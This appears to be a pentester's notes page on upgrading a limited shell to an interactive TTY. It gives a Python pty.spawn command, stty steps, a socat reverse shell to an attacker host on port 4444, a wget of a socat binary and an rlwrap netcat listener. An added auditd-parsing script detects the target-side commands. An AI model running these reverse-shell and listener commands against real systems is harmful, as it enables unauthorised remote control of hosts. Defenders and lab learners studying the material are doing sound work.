# Disboard #

Upgrading Shells

A list of methods to upgrade shells to fully interactive TTYs!

Python PTY Upgrade

Run the following command in the limited shell:

python -c 'import pty; pty.spawn("/bin/bash")'

The shell will now look prettier and have some TTY capabilities. For full interactivity, set TERM with the following command so that terminal commands such as clear work:

export TERM=xterm

Finally, background the shell with [Ctrl-Z], then run the following commands on the attack box. The first turns off the attack box's terminal echo and passes keystrokes through raw, which gives autocompletion and arrow keys in the shell. The second foregrounds the shell again.

stty raw -echo
fg

If this works, it will end as a fully interactive TTY shell. Sometimes, it might also be useful to modify the terminal tty size. This can be done by checking your attack box's values and then copying them over with the following:

# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH

Socat Upgrade

This method uses socat to create a second reverse shell that is fully interactive.

On the attack box, create a listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

On the target, launch a reverse shell:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:4444

If socat is missing, a statically compiled binary can be downloaded with the following commands:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat
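
From the defender's side, the target-side commands in the Python PTY and Socat sections leave process-execution records. The following is an added example, not part of the original page: it parses Linux auditd EXECVE records and flags both commands. It assumes auditd is logging execve calls; the log lines, rule names and function names are constructed for illustration.

```python
import re

# Constructed auditd EXECVE records (not from a real host). auditd hex-encodes any
# argument containing spaces or quotes, so a plain grep for "pty.spawn" finds nothing.
SAMPLE_LOG = "\n".join([
    'type=EXECVE msg=audit(1700000000.101:501): argc=3 a0="python" a1="-c" a2='
    + b'import pty; pty.spawn("/bin/bash")'.hex().upper(),
    'type=EXECVE msg=audit(1700000000.202:502): argc=3 a0="/tmp/socat" a1='
    + b"exec:bash -li,pty,stderr,setsid,sigint,sane".hex().upper()
    + ' a2="tcp:192.0.2.10:4444"',
    'type=EXECVE msg=audit(1700000000.303:503): argc=2 a0="python3" a1="manage.py"',
    'type=EXECVE msg=audit(1700000000.404:504): argc=3 a0="socat" a1="-d" a2="tcp-listen:8080,fork"',
])

ARG = re.compile(r'\ba(\d+)=("([^"]*)"|[0-9A-Fa-f]+)')   # quoted or hex-encoded argument
EVENT_ID = re.compile(r"msg=audit\(([\d.]+:\d+)\)")       # timestamp:serial of the event

def decode_argv(record):
    """Return argv from one EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, raw, quoted in ARG.findall(record):
        args[int(idx)] = quoted if raw.startswith('"') else bytes.fromhex(raw).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def classify(argv):
    """Name the shell-upgrade command from this page that argv matches, or None."""
    exe = argv[0].rsplit("/", 1)[-1]          # match on basename: /tmp/socat counts as socat
    rest = " ".join(argv[1:])
    if re.fullmatch(r"python[\d.]*", exe) and "-c" in argv and re.search(r"\bpty\.spawn\s*\(", rest):
        return "python_pty_spawn"
    if exe == "socat" and any(re.match(r"(?i)exec:", a) and re.search(r",pty\b", a) for a in argv[1:]):
        return "socat_exec_pty"
    return None

def detect(log):
    """Return (audit event id, rule name, argv) for each matching EXECVE record."""
    hits = []
    for line in log.splitlines():
        if "type=EXECVE" not in line:
            continue
        argv = decode_argv(line)
        rule = classify(argv) if argv else None
        if rule:
            hits.append((EVENT_ID.search(line).group(1), rule, argv))
    return hits

if __name__ == "__main__":
    for event_id, rule, argv in detect(SAMPLE_LOG):
        print(event_id, rule, argv)
```

The rlwrap listener runs on the attack box, so it produces no process record on the target and is not covered here.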

RLWrap Upgrade

The program rlwrap gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization must still be utilized for interrupts like [Ctrl-C] to be used.

rlwrap nc -nvlp $PORT

Often, this is also set up as an alias to use in place of a plain listener:

alias listener='sudo rlwrap nc -nvlp'

Last updated 1 year ago